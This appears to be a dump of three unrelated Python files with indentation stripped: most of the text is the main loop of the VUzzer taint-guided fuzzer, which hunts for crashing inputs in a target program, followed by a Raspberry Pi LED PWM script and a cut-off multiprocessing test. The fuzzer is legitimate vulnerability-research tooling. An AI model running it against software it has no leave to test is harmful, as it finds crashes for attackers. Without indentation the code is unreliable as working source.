runcmd = [pargs[0], args, fl, str(config.TIMEOUT)]
#pargs[pargs.index("inputf")]=fl
#runcmd=pargs + args.split.split(' ')
print "[*] Executing: "," ".join(runcmd)
retc, lava_code = run(runcmd)
if config.CLEANOUT == True:
gau.delete_out_file(tfl)
return (retc, lava_code)
def extract_offsetStr(offStr,hexs,fsize):
'''offStr : {4,5,6} hexs : 0x5a76616c fsize : byte size of the entire file'''
'''Given a string of offsets, separated by comma and other offset num, this function return a tuple of first offset and hex_string.'''
offsets=offStr.split(',')
offsets=[int(o) for o in offsets]
if len(offsets)<5:#==1:#<5:
ofs=offsets[0]# as this only to detect magicbytes, i assume that magicbytes are contiguous in file and thus i only consider the 1st offset.
if ofs>fsize-config.MINOFFSET:
ofs=ofs-fsize
hexstr=get_hexStr(hexs)
#raw_input("hexStr: %s"%(hexstr,))
#raw_input("hexstr is %s"%(bina.b2a_hex(hexstr),))
return (ofs,hexstr)
else:
return (-1000, offsets[:])
def get_non_empty(mat, num):
ind=num
#mi = 1000000
while ind < num+9:
# I have changed this
try:
if mat.group(ind) !='':
#mi = min(mi, int(mat.group(ind)))
return mat.group(ind)
finally:
ind +=1
#if mi == 1000000:
return -1
#return str(mi)
def read_lea(fl):
'''
we also read lea.out file to know offsets that were used in LEA instructions. There offsets are good candidates to fuzz with extreme values, like \xffffffff, \x80000000.'''
if ((not os.path.isfile("lea.out")) or os.path.getsize("lea.out") ==0):
print "[*] Warning! empty lea.out file!"
return set()
leaFD=open("lea.out","r")
offsets=set() # set to keep all the offsets that are used in LEA instructions.
pat=re.compile(r"(\d+) (\w+) \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\}",re.I)
cur_func = ""
func_leamap = dict()
for ln in leaFD:
mat=pat.match(ln)
try:# this is a check to see if lea entry is complete.
if config.BIT64 == False:
rr=mat.group(6)
else:
rr=mat.group(10)
except:
if "baseidx" not in ln:
cur_func = ln.strip()
if cur_func not in func_leamap:
func_leamap[cur_func] = set()
continue
tempoff=get_non_empty(mat,3)#mat.group(9)
if tempoff == -1:
continue
toff=[int(o) for o in tempoff.split(',')]
if len(toff)<5:
func_leamap[cur_func].update(toff)
offsets.add(toff[0])
config.FUNC_LEAMAP[fl] = func_leamap
leaFD.close()
return offsets.copy()
def record_funcexec(funcset):
funchash = 0
hashidx = 0
func_orig_set = set()
for func in funcset:
func_orig_set.add(func)
for func in config.FUNC_ID_MAP:
if func in funcset:
funchash = funchash | (1 << hashidx)
funcset.remove(func)
hashidx += 1
for func in funcset:
config.FUNC_ID_MAP.append(func)
funchash = funchash | (1 << hashidx)
hashidx += 1
if funchash not in config.FUNC_HASH_SET:
for fn1 in func_orig_set:
for fn2 in func_orig_set:
if fn1 in config.FUNC_EXEC:
if fn2 in config.FUNC_EXEC[fn1]:
config.FUNC_EXEC[fn1][fn2] += 1
else:
config.FUNC_EXEC[fn1][fn2] = 1
else:
config.FUNC_EXEC[fn1] = {fn2 : 1}
if fn2 in config.FUNC_EXEC:
if fn1 in config.FUNC_EXEC[fn2]:
config.FUNC_EXEC[fn2][fn1] += 1
else:
config.FUNC_EXEC[fn2][fn1] = 1
else:
config.FUNC_EXEC[fn2] = {fn1 : 1}
config.FUNC_HASH_SET.add(funchash)
def read_func(fl):
if ((not os.path.isfile("func.out")) or os.path.getsize("func.out") == 0):
print "[*] Warning! empty func.out file!"
return
funcFD = open("func.out", "r")
funcset = set()
for ln in funcFD:
funcname, funcoffset = tuple(ln.strip().split(","))
if funcname in funcset:
continue
funcset.add(funcname)
config.OFFSET_FUNCNAME[long(funcoffset)] = funcname
funcFD.close()
record_funcexec(funcset)
funcFD.close()
def check_timeout():
cur_time = time.time() - config.START_TIME
if (config.REL_STATUS == 0 and cur_time > config.REL_TIMEOUT1):
config.REL_STATUS = 1
elif (config.REL_STATUS == 1 and cur_time > config.REL_TIMEOUT2):
config.REL_STATUS = 2
elif (config.REL_STATUS == 2 and cur_time > config.REL_TIMEOUT3):
config.REL_STATUS = 3
if (cur_time) > config.TOTAL_TIMEOUT:
print "[**] Timeout reached"
if config.START_TIME != 0:
print "[**] Totol time %f sec."%(time.time() -config.START_TIME,)
print "[**] Fuzzing done. Check %s to see if there were crashes.."%(config.ERRORS,)
exit(0)
def read_taint(fpath, fl):
''' This function read cmp.out file and parses it to extract offsets and coresponding values and returns a tuple(alltaint, taintoff).
taintoff: {offset -> a set of hex values} (hex values which are checked for that offset in the cmp instruction.)
Currently, we want to extract values s.t. one of the operands of CMP instruction is imm value for this set of values.
ADDITION: we also read lea.out file to know offsets that were used in LEA instructions. There offsets are good candidates to fuzz with extreme values, like \xffffffff, \x80000000.
'''
taintOff=dict()#dictionary to keep info about single tainted offsets and values.
alltaintoff=set()#it keeps all the offsets (expluding the above case) that were used at a CMP instruction.
func_taintmap = dict()
fsize=os.path.getsize(fpath)
offlimit=0
#check if taint was generated, else exit
if ((not os.path.isfile("cmp.out")) or os.path.getsize("cmp.out") ==0):
print "[*] Warning! empty cmp.out file!"
return (alltaintoff, taintOff)
#gau.die("Empty cmp.out file! Perhaps taint analysis did not run...")
cmpFD=open("cmp.out","r")
# each line of the cmp.out has the following format:
#32 reg imm 0xb640fb9d {155} {155} {155} {155} {} {} {} {} 0xc0 0xff
#g1 g2 g3 g4 g5 g6 g7 g8 g9 g10 g11 g12 g13 g14
# we need a regexp to parse this string.
cur_func = ""
if config.BIT64 == False:
pat=re.compile(r"(\d+) ([a-z]+) ([a-z]+) (\w+) \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} (\w+) (\w+)",re.I)
else:
pat=re.compile(r"(\d+) ([a-z]+) ([a-z]+) (\w+) \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} \{([0-9,]*)\} (\w+) (\w+)",re.I)
for ln in cmpFD:
if offlimit>config.MAXFILELINE:
break
offlimit +=1
mat=pat.match(ln)
try:# this is a check to see if CMP entry is complete.
if config.BIT64 == False:
rr=mat.group(14)
else:
rr=mat.group(22)
except:
cur_func = ln.strip()
if cur_func not in func_taintmap:
func_taintmap[cur_func] = set()
continue
if config.BIT64 == False:
op1start = 5
op2start = 9
op1val = 13
op2val = 14
else:
op1start = 5
op2start = 13
op1val = 21
op2val = 22
if config.ALLCMPOP == True: #False by default
'''
if mat.group(op1start) =='' and mat.group(op2start) !='':
tempoff=get_non_empty(mat,op2start)#mat.group(9)
if tempoff ==-1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op1val),fsize)
elif mat.group(op2start) =='' and mat.group(op1start) !='':
tempoff=get_non_empty(mat,op1start)#mat.group(5)
if tumpoff ==-1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op2val),fsize)
else:
ofs,hexstr=(-1000,[])
if ofs !=-1000:
if config.ALLBYTES==True or (hexstr !='\xff\xff\xff\xff' and hexstr != '\x00'):#this is a special case
if ofs not in taintOff:
taintOff[ofs]=[hexstr]# we are going to change set to list for "last" offset checked.
else:
#if hexstr not in taintOff[ofs]:
if config.ALLBYTES == True or isNonPrintable(hexstr) ==False:
taintOff[ofs].append(hexstr)
else:
alltaintoff.update(set(hexstr))
'''
else:
if mat.group(2) == 'imm': # possible?
tempoff=get_non_empty(mat,op2start)#mat.group(13)
if tempoff == -1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op1val),fsize)
if ofs !=-1000:
func_taintmap[cur_func].add(ofs)
if config.ALLBYTES == True or (hexstr !='\xff\xff\xff\xff' and hexstr != '\x00'):#this is a special case
if ofs not in taintOff:
taintOff[ofs]=[hexstr]# we are going to change set to list for "last" offset checked.
else:
#if hexstr not in taintOff[ofs]:
if config.ALLBYTES == True or isNonPrintable(hexstr) ==False:
taintOff[ofs].append(hexstr)
else:
#alltaintoff.update(set(offsets))
alltaintoff.update(set(hexstr))
elif mat.group(3) == 'imm':
tempoff=get_non_empty(mat,op1start)#mat.group(5)
if tempoff == -1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op2val),fsize)
if ofs !=-1000:
func_taintmap[cur_func].add(ofs)
if config.ALLBYTES == True or (hexstr !='\xff\xff\xff\xff' and hexstr !='\x00'):#this is a special case
if ofs not in taintOff:
taintOff[ofs]=[hexstr]# we are going to change set to list for "last" offset checked.
else:
#if hexstr not in taintOff[ofs]:
if config.ALLBYTES == True or isNonPrintable(hexstr) ==False:
taintOff[ofs].append(hexstr)
else:
alltaintoff.update(set(hexstr))
elif ((mat.group(2) == 'mem' and mat.group(3) =='mem') or (mat.group(2) == 'reg' and mat.group(3) =='reg')):
#bylen=mat.group(1)/8
#if bylen == 1:
#TOFIX: I am assuming that CMPS has second operand as constant and 1st operand is the byte from the input that we want to compare with 2nd operand. We need to handle the case when these operands are swapped.
if mat.group(op1start) =='' and mat.group(op2start) !='':
tempoff=get_non_empty(mat,op2start)#mat.group(9)
if tempoff ==-1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op1val),fsize)
elif mat.group(op2start) =='' and mat.group(op1start) !='':
tempoff=get_non_empty(mat,op1start)#mat.group(5)
if tempoff ==-1:
continue
ofs,hexstr=extract_offsetStr(tempoff,mat.group(op2val),fsize)
else:
ofs,hexstr=(-1000,[])
if ofs !=-1000:
func_taintmap[cur_func].add(ofs)
if config.ALLBYTES == True or (hexstr !='\xff\xff\xff\xff' and hexstr != '\x00'):#this is a special case
if ofs not in taintOff:
taintOff[ofs]=[hexstr]# we are going to change set to list for "last" offset checked.
else:
#if hexstr not in taintOff[ofs]:
if config.ALLBYTES == True or isNonPrintable(hexstr) ==False:
taintOff[ofs].append(hexstr)
else:
alltaintoff.update(set(hexstr))
else:
tmpset=set()
tmp1=mat.group(op1start)
if len(tmp1)>0:
tmpset.update(tmp1.split(','))
tmp2=mat.group(op2start)
if len(tmp2)>0:
tmpset.update(tmp2.split(','))
alltaintoff.update([int(o) for o in tmpset])
#alltaintoff.update(tmp1.split(','),tmp2.split(','))
#alltaintoff=set([int(o) for o in alltaintoff])
cmpFD.close()
todel=set()
for el in alltaintoff:
if el>fsize-config.MINOFFSET:
todel.add(el)
for el in todel:
alltaintoff.remove(el)
alltaintoff.add(el-fsize)
config.FUNC_TAINTMAP[fl] = func_taintmap
return (alltaintoff,taintOff)
def get_taint(dirin, is_initial=0):
''' This function is used to get taintflow for each CMP instruction to find which offsets in the input are used at the instructions. It also gets the values used in the CMP.'''
#print "[*] starting taintflow calculation."
files=os.listdir(dirin)
#taintmap=dict()#this is a dictionary to keep taintmap of each input file. Key is the input file name and value is a tuple returned by read_taint, wherein 1st element is a set of all offsets used in cmp and 2nd elment is a dictionary with key a offset and value is a set of values at that offsetthat were found in CMP instructions.
#mostcommon=dict()# this dictionary keeps offsets which are common across all the inputs with same value set.
for fl in files:
check_timeout()
if fl in config.TAINTMAP:
continue
pfl=os.path.abspath(os.path.join(dirin,fl))
if is_initial == 1:
tnow1=datetime.now()
rcode=execute2(pfl,fl, is_initial)
if is_initial == 1:
tnow2=datetime.now()
config.TIMEOUT = max(config.TIMEOUT, 2*((tnow2-tnow1).total_seconds()))
if rcode ==255:
#continue #what..?!
gau.die("pintool terminated with error 255 on input %s"%(pfl,))
config.TAINTMAP[fl]=read_taint(pfl, fl)
config.LEAMAP[fl]=read_lea(fl)
#read_func(fl)
if config.MOSTCOMFLAG==False: #False by default
#print "computing MOSTCOM calculation..."
for k1,v1 in config.TAINTMAP.iteritems():
for off1,vset1 in v1[1].iteritems():
common_tag=True
if off1 > config.MAXOFFSET:
config.TAINTMAP[k1][0].add(off1)
#print "[==] ",k1,off1
continue
for k2,v2 in config.TAINTMAP.iteritems():
if off1 not in v2[1]:
config.TAINTMAP[k1][0].add(off1)
#print k2,v2[1]
common_tag=False
break
#print "passed..", off1
if len(set(vset1) & set(v2[1][off1]))==0:#set(vset1) != set(v2[off1])
#print k1, k2, off1, set(vset1), set(v2[1][off1])
config.TAINTMAP[k1][0].add(off1)
common_tag=False
break
#print "passed set", vset1
if common_tag==True:
config.MOSTCOMMON[off1]=list(set(vset1[:]))
#print "[++]",config.MOSTCOMMON[off1]
break # we just want to take one input and check if all the offsets in other inputs have commonality.
else:
#print "computing MORECOM calculation..."
for k1,v1 in config.TAINTMAP.iteritems():
for off1,vset1 in v1[1].iteritems():
common_tag=True
#if off1 > config.MAXOFFSET:
#print k1,off1
# continue
for k2,v2 in config.TAINTMAP.iteritems():
if off1 not in v2[1]:
config.TAINTMAP[k1][0].add(off1)
#print k2,v2[1]
common_tag=False
break
if len(set(vset1) ^ set(v2[1][off1]))>3:#vset1 != v2[1][off1]:
#print k2, vset1, v2[1][off1]
config.TAINTMAP[k1][0].add(off1)
common_tag=False
break
if common_tag==True:
config.MORECOMMON[off1]=list(set(vset1[:]))
#print config.MOSTCOMMON[off1]
break # we just want to take one input and check if all the offsets in other inputs have commonality.
#print config.MOSTCOMMON, '=====', config.MORECOMMON
#gw = raw_input("press enter")
print "[*] taintflow finished."
def dry_run():
''' this function executes the initial test set to determine error handling BBs in the SUT. Such BBs are given zero weights during actual fuzzing.
'''
print "[*] Starting dry run now..."
tempbad=[]
dfiles=os.listdir(config.INITIALD)
if len(dfiles) <3:
gau.die("not sufficient initial files")
for fl in dfiles:
tfl=os.path.join(config.INITIALD,fl)
try:
f=open(tfl, 'r')
f.close()
except:
gau.die("can not open our own input %s!"%(tfl,))
(bbs,retc,lava_code)=execute(tfl)
if retc not in config.NON_CRASH_RET_CODES:
print "Signal: %d"% (retc,)
print tfl
gau.die("looks like we already got a crash!!")
config.GOODBB |= set(bbs.keys())
iln = os.path.getsize(tfl)
gau.fitnesCal2(bbs, fl, iln, retc)
print "[*] Finished good inputs (%d)"%(len(config.GOODBB),)
#now lets run SUT of probably invalid files. For that we need to create them first.
print "[*] Starting bad inputs.."
lp=0
badbb=set()
while lp <2:
try:
shutil.rmtree(config.INPUTD)
except OSError:
pass
os.mkdir(config.INPUTD)
gau.create_files_dry(30)
dfiles=os.listdir(config.INPUTD)
for fl in dfiles:
tfl=os.path.join(config.INPUTD,fl)
(bbs,retc,lava_code)=execute(tfl)
if retc not in config.NON_CRASH_RET_CODES :
print "Signal: %d"% (retc,)
print tfl
gau.die("looks like we already got a crash!!")
tempbad.append(set(bbs.keys()) - config.GOODBB)
tempcomn=set(tempbad[0])
for di in tempbad:
tempcomn.intersection_update(set(di))
badbb.update(tempcomn)
lp +=1
#else:
# tempcomn = set()
###print "[*] finished bad inputs (%d)"%(len(tempbad),)
config.ERRORBBALL=badbb.copy()
print "[*] finished common BB. Total bad BB: %d"%(len(badbb),)
for ebb in config.ERRORBBALL:
print "error bb: 0x%x"%(ebb,)
time.sleep(5)
if config.LIBNUM == 2:
baseadr=config.LIBOFFSETS[1]
for ele in tempcomn:
if ele < baseadr:
config.ERRORBBAPP.add(ele)
else:
config.ERRORBBLIB.add(ele-baseadr)
del tempbad
del badbb
#del tempgood
return len(config.GOODBB),len(config.ERRORBBALL)
def get_rel_funcs():
for ff in config.REL_FUNC_FILES:
fi = open(ff, "r")
rel_funcs = pickle.load(fi)
for func in rel_funcs:
if func in config.REL_FUNC:
config.REL_FUNC[func].update(rel_funcs[func])
else:
config.REL_FUNC[func] = rel_funcs[func]
fi.close()
def print_func_exec():
ff = open(os.path.join(config.LOGS, "funcrel.csv"), "w")
fl = config.FUNC_EXEC.keys()
ff.write(",")
for f1 in fl:
ff.write(f1+",")
ff.write("\n")
for f1 in fl:
ff.write(f1 +",")
for f2 in fl:
if f2 not in config.FUNC_EXEC[f1]:
ff.write("0,")
else:
ff.write(str(config.FUNC_EXEC[f1][f2]) + "," )
ff.write("\n")
ff.close()
def run_error_bb(pt):
print "[*] Starting run_error_bb."
files = os.listdir(config.INPUTD)
for fl in files:
tfl=os.path.join(config.INPUTD,fl)
(bbs,retc,lava_code)=execute(tfl)
#if retc < 0:
# print "[*] crashed while executing %s"%(fl,)
# gau.die("Bye...")
print "[*] form bitvector of ",fl
form_bitvector(bbs)
print "[*] start calculateing error bb"
calculate_error_bb()
def copy_files(src, dest,num):
files = random.sample(os.listdir(src),num)
for fl in files:
tfl=os.path.join(src,fl)
shutil.copy(tfl,dest)
def conditional_copy_files(src, dest,num):
#count = 0;
#tempbuf=set()
flist=os.listdir(src)
# we need to handle the case wherein newly added files in SPECIAL are less than the num. in this case, we only copy these newly added files to dest.
extra=set(flist)-set(config.TAINTMAP)
if len(extra) == 0:
return -1
if len(extra)<num:
for fl in extra:
tfl=os.path.join(src,fl)
shutil.copy(tfl,dest)
return 0
else:
tlist=random.sample(list(extra),num)
for fl in tlist:
tfl=os.path.join(src,fl)
shutil.copy(tfl,dest)
return 0
#while count <num:
# fl =random.choice(os.listdir(src))
# if fl not in config.TAINTMAP and fl not in tempbuf:
# tempbuf.add(fl)
# count +=1
# tfl=os.path.join(src,fl)
# shutil.copy(tfl,dest)
#del tempbuf
def main():
# first lets create the base directorty to keep all temporary data
try:
shutil.rmtree(config.BASETMP)
except OSError:
pass
if os.path.isdir(config.BASETMP)== False:
os.mkdir(config.BASETMP)
check_env()
## parse the arguments #########
parser = argparse.ArgumentParser(description='VUzzer options')
parser.add_argument('-s','--sut', help='SUT commandline',required=True)
parser.add_argument('-i','--inputd', help='seed input directory (relative path)',required=True)
parser.add_argument('-w','--weight', help='path of the pickle file(s) for BB wieghts (separated by comma, in case there are two) ',required=True)
parser.add_argument('-n','--name', help='Path of the pickle file(s) containing strings from CMP inst (separated by comma if there are two).',required=True)
parser.add_argument('-l','--libnum', help='Nunber of binaries to monitor (only application or used libraries)',required=False, default=1)
parser.add_argument('-o','--offsets',help='base-address of application and library (if used), separated by comma', required=False, default='0x00000000')
parser.add_argument('-b','--libname',help='library name to monitor',required=False, default='#')
parser.add_argument('-f','--func', help='rel func file got from ghiddra', required=False, default='')
args = parser.parse_args()
config.SUT=args.sut
config.INITIALD=os.path.join(config.INITIALD, args.inputd)
config.LIBNUM=int(args.libnum)
config.LIBTOMONITOR=args.libname
config.LIBPICKLE=[w for w in args.weight.split(',')]
config.NAMESPICKLE=[n for n in args.name.split(',')]
config.LIBOFFSETS=[o for o in args.offsets.split(',')]
config.REL_FUNC_FILES=[f for f in args.func.split(',')]
config.LIBS=args.libname
ih=config.BBCMD.index("LIBS=") # this is just to find the index of the placeholder in BBCMD list to replace it with the libname
config.BBCMD[ih]="LIBS=%s" % args.libname
###################################
config.minLength=get_min_file(config.INITIALD)
try:
shutil.rmtree(config.KEEPD)
except OSError:
pass
os.mkdir(config.KEEPD)
try:
shutil.rmtree(config.KEEPALLD)
except OSError:
pass
os.mkdir(config.KEEPALLD)
try:
os.mkdir("outd")
except OSError:
pass
try:
os.mkdir("outd/crashInputs")
except OSError:
gau.emptyDir("outd/crashInputs")
crashHash=[]
try:
os.mkdir(config.SPECIAL)
except OSError:
gau.emptyDir(config.SPECIAL)
try:
os.mkdir(config.INTER)
except OSError:
gau.emptyDir(config.INTER)
try:
os.mkdir(config.LOGS)
except OSError:
gau.emptyDir(config.LOGS)
#############################################################################
#let us get the base address of the main executable.
'''
ifiles=os.listdir(config.INITIALD)
for fl in ifiles:
tfl=os.path.join(config.INITIALD,fl)
try:
f=open(tfl, 'r')
f.close()
except:
gau.die("can not open our own input %s!"%(tfl,))
(ibbs,iretc)=execute(tfl)
break # we just want to run the executable once to get its load address
imgOffFd=open("imageOffset.txt",'r')
for ln in imgOffFd:
if "Main:" in ln:
lst=ln.split()
break
config.LIBOFFSETS[0]=lst[1][:]
imgOffFd.close()
#############################################################################
'''
#it does not automatically read right offset......
config.LIBOFFSETS[0]= "0x400000"
###### open names pickle files
gau.prepareBBOffsets()
# lets initialize the BBFORPRUNE list from thie cALLBB set.
if len(config.cALLBB)>0:
config.BBFORPRUNE=list(config.cALLBB)
else:
print"[*]: cALLBB is not initialized. something is wrong!!\n"
raise SystemExit(1)
if config.PTMODE: #false
pt = simplept.simplept()
else:
pt = None
if config.ERRORBBON==True:
gbb,bbb=dry_run()
else:
gbb=0
get_rel_funcs()
# gau.die("dry run over..")
import timing
#selftest()
noprogress=0
currentfit=0
lastfit=0
config.CRASHIN.clear()
stat=open(os.path.join(config.LOGS,"stats.log"),'w')
stat.write("**** Fuzzing started at: %s ****\n"%(datetime.now().isoformat('+'),))
stat.write("**** Initial BB for seed inputs: %d ****\n"%(gbb,))
stat.flush()
os.fsync(stat.fileno())
stat.write("Genaration\t MINfit\t MAXfit\t AVGfit MINlen\t Maxlen\t AVGlen\t #BB\t AppCov\t AllCov\t Crash\n")
stat.flush()
os.fsync(stat.fileno())
config.START_TIME=time.time()
allnodes = set()
alledges = set()
try:
shutil.rmtree(config.INPUTD)
except OSError:
pass
shutil.copytree(config.INITIALD,config.INPUTD)
# fisrt we get taint of the intial inputs
get_taint(config.INITIALD) #,1)
check_timeout()
'''
print "TAINTMAP : \n"
for f in config.TAINTMAP:
print "{",f,"}->(alltaint(size:",len(config.TAINTMAP[f][0]),"): ",config.TAINTMAP[f][0],","
print "bytes_value: (# of bytes : ",len(config.TAINTMAP[f][1]),
for b in config.TAINTMAP[f][1]:
print b,"-> ",len(config.TAINTMAP[f][1][b])," values, ",
print ""
'''
config.MOSTCOMFLAG=True
crashhappend=False
filest = os.listdir(config.INPUTD)
filenum=len(filest)
if filenum < config.POPSIZE:
gau.create_files(config.POPSIZE - filenum)
if len(os.listdir(config.INPUTD)) != config.POPSIZE:
gau.die("something went wrong. number of files is not right!")
efd=open(config.ERRORS,"w")
#gau.prepareBBOffsets() #??
writecache = True
genran=0
bbslide=40 # this is used to call run_error_BB() functions
keepslide=3
keepfilenum=config.BESTP
config.SEENBB.clear()#initialize set of BB seen so far, which is 0
todelete=set()#temp set to keep file names that will be deleted in the special folder
check_timeout()
while True:
#print "[**] Generation %d\n***********"%(genran,)
del config.TEMPTRACE[:]
del config.BBSEENVECTOR[:]
check_timeout()
SPECIALCHANGED= False # this is set when a config.SPECIAL gets at least one new input per generation.
config.TMPBBINFO.clear()
config.TMPBBINFO.update(config.PREVBBINFO)
fitnes=dict()
execs=0
config.cPERGENBB.clear()
config.GOTSTUCK=False
if False: #config.ERRORBBON == True:
if genran > config.GENNUM/5:
bbslide = max(bbslide,config.GENNUM/20)
keepslide=max(keepslide,config.GENNUM/100)
keepfilenum=keepfilenum/2
if 0 < genran < config.GENNUM/5 and genran%keepslide == 0:
copy_files(config.INPUTD,config.KEEPD,keepfilenum)
#lets find out some of the error handling BBs
if genran > 40 and genran % bbslide==0:
stat.write("\n**** Error BB cal started ****\n")
stat.flush()
os.fsync(stat.fileno())
run_error_bb(pt)
copy_files(config.KEEPD,config.INPUTD,len(os.listdir(config.KEEPD))*1/10)
#copy_files(config.INITIALD,config.INPUTD,1)
files=os.listdir(config.INPUTD)
per_gen_fnum=0
execute_time = time.time()
#count BB and calculate fitness function for each TC.
for fl in files:
check_timeout()
per_gen_fnum +=1
tfl=os.path.join(config.INPUTD,fl)
iln=os.path.getsize(tfl)
args = (config.SUT % tfl).split(' ')
progname = os.path.basename(args[0])
(bbs,retc,lava_code)=execute(tfl) #count bb
if per_gen_fnum % 10 ==0:
print "[**] Gen: %d. Executed %d of %d.**, took %f sec"%(genran,per_gen_fnum,config.POPSIZE, time.time() -execute_time)
execute_time = time.time()
if config.BBWEIGHT == True: #True by default
fitnes[fl]=gau.fitnesCal2(bbs,fl,iln, retc)
else:
fitnes[fl]=gau.fitnesNoWeight(bbs,fl,iln)
execs+=1
#let us prune the inputs(if at all), whose trace is subset of the new input just got executed.
SPECIALADDED= False
if config.GOTSPECIAL == True : #config.GOTSPECIAL==True : #and (retc in config.NON_CRASH_RET_CODES) :
SPECIALCHANGED=True
SPECIALADDED= True
todelete.clear()
tbv = gen_bitvector(bbs, config.BBFORPRUNE)
#form_bitvector2(bbs,fl,config.BBFORPRUNE,config.SPECIALBITVECTORS)
if tbv not in config.SPECIAL_BITVECTOR:
config.SPECIAL_BITVECTOR.add(tbv)
shutil.copy(tfl, config.SPECIAL)
#config.SPECIAL_BITVECTOR_FL[fl] = tbv
if retc not in config.NON_CRASH_RET_CODES and (lava_code not in config.LAVA_CRASH or lava_code == 0):
config.LAVA_CRASH.add(lava_code)
efd.write("%s: %d\n"%(tfl, retc))
efd.flush()
os.fsync(efd)
#tmpHash=sha1OfFile(config.CRASHFILE)
#if tmpHash not in crashHash:
#crashHash.append(tmpHash)
tnow=datetime.now().isoformat().replace(":","-")
nf="%s-%s.%s"%(progname,tnow,gau.splitFilename(fl)[1])
npath=os.path.join("outd/crashInputs",nf)
shutil.copyfile(tfl,npath)
if SPECIALADDED == False:
shutil.copy(tfl,config.SPECIAL)
config.CRASHIN.add(fl)
if config.STOPONCRASH == True:
#efd.close()
crashhappend=True
break
fitscore=[v for k,v in fitnes.items()]
maxfit=max(fitscore)
avefit=sum(fitscore)/len(fitscore)
mnlen,mxlen,avlen=gau.getFileMinMax(config.INPUTD)
print "[*] Done with all input in Gen, starting SPECIAL. \n"
appcov,allcov=gau.calculateCov()
tnow=datetime.now().isoformat().replace(":","-")
stat.write("\t%d\t %d\t %d\t %d\t %d\t %d\t %d\t %d\t %d\t %d\t %s\t %d\n"%(genran,min(fitscore),maxfit,avefit,mnlen,mxlen,avlen,len(config.SEENBB),appcov,allcov,tnow,len(config.CRASHIN)))
stat.flush()
os.fsync(stat.fileno())
print "[*] Wrote to stat.log\n"
if crashhappend == True:
break
#lets find out some of the error handling BBs
genran += 1
#this part is to get initial fitness that will be used to determine if fuzzer got stuck.
lastfit=currentfit
currentfit=len(config.SEENBB)
if currentfit==lastfit:#lastfit-config.FITMARGIN < currentfit < lastfit+config.FITMARGIN:
noprogress +=1
else:
noprogress =0
if noprogress > 20:
config.GOTSTUCK=True
stat.write("Heavy mutate happens now..\n")
noprogress =0
if (genran >= config.GENNUM) and (config.STOPOVERGENNUM == True):
break
if len(os.listdir(config.SPECIAL))>0 and SPECIALCHANGED == True:
if len(os.listdir(config.SPECIAL))<config.NEWTAINTFILES: #The # of new generated special TC is not big
get_taint(config.SPECIAL)
#print_func_exec()
else:
#take only 100 files in SPEICAL, perform taint analysis on it.
try:
os.mkdir(config.TAINTTMP)
except OSError:
gau.emptyDir(config.TAINTTMP)
if conditional_copy_files(config.SPECIAL,config.TAINTTMP,config.NEWTAINTFILES) == 0:
get_taint(config.TAINTTMP)
print "[*] Going for new generation creation.\n"
gau.createNextGeneration3(fitnes,genran)
efd.close()
stat.close()
libfd_mm.close()
libfd.close()
endtime=time.time()
print "[**] Totol time %f sec."%(endtime-config.START_TIME,)
print "[**] Fuzzing done. Check %s to see if there were crashes.."%(config.ERRORS,)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
main()
'''
fuzzthread = threading.Thread(target = main)
fuzzthread.start()
if config.FLASK:
socketio.run(app, host="0.0.0.0", port=5000)
'''
|
blink_pwm.py
|
'''
@author: Vikram Udyawer
@date: 25th March 2017 Saturday
@summary: PWM controlled RGB LED
@description:
Code for a Raspberry Pi to switch ON
an RGB LED its different colors using PWM.
'''
import RPi.GPIO as GPIO
import threading
import time
import random
R = 19
G = 20
B = 21
PINS = [R,G,B]
ROTATION_IN_MS = 750
def initializeGpio():
GPIO.setmode(GPIO.BCM)
GPIO.setup(PINS, GPIO.OUT, initial=GPIO.LOW)
def rgbTest(channel, frequency, speed, step):
p = GPIO.PWM(channel, frequency)
p.start(0)
while True:
for dutyCycle in range(0, 101, step):
p.ChangeDutyCycle(dutyCycle)
time.sleep(speed)
for dutyCycle in range(100, -1, -step):
p.ChangeDutyCycle(dutyCycle)
time.sleep(speed)
def rgbThread():
threads = []
threads.append(threading.Thread(target=rgbTest, args=(R, 300, 0.02, 50)))
threads.append(threading.Thread(target=rgbTest, args=(G, 300, 0.035, 50)))
threads.append(threading.Thread(target=rgbTest, args=(B, 300, 0.045, 50)))
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
def main():
try:
initializeGpio()
print("\nPress ^C (control-C) to exit the program.\n")
rgbThread()
except KeyboardInterrupt:
pass
finally:
GPIO.cleanup()
if __name__ == '__main__':
main()
|
mp_synchronize.py
|
#
# A test file for the `multiprocessing` package
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time, sys, random
from queue import Empty
import multiprocessing # may get overwritten
#### TEST_VALUE
def value_func(running, mutex):
random.seed()
time.sleep(random.random()*4)
mutex.acquire()
print('\n\t\t\t' + str(multiprocessing.current_process()) + ' has finished')
running.value -= 1
mutex.release()
def test_value():
TASKS = 10
running = multiprocessing.Value('i', TASKS)
mutex = multiprocessing.Lock()
for i in range(TASKS):
p = multiprocessing.Process(target=value_func, args=(running, mutex))
p.start()
while running.value > 0:
time.sleep(0.08)
mutex.acquire()
print(running.value, end=' ')
sys.stdout.flush()
mutex.release()
print()
print('No more running processes')
#### TEST_QUEUE
def queue_func(queue):
for i in range(30):
time.sleep(0.5 * random.random())
queue.put(i*i)
queue.put('STOP')
def test_queue():
q = multiprocessing.Queue()
p = multiprocessing.Process(target=queue_func, args=(q,))
p.start()
o = None
while o != 'STOP':
try:
o = q.get(timeout=0.3)
print(o, end=' ')
sys.stdout.flush()
except Empty:
print('TIMEOUT')
print()
#### TEST_CONDITION
def condition_func(cond):
cond.acquire()
